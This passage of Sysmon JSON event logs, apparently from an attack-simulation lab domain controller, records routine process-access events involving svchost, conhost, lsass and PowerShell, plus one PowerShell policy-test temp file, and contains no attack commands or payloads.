06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.770\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.770","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.786\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nProcessId: 1576\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gmdc0oua.zhg.ps1\r\nCreationUtcTime: 2020-08-01 06:54:55.786","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.786","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gmdc0oua.zhg.ps1","CreationUtcTime":"2020-08-01 06:54:55.786","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.817\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.817","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.817\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: 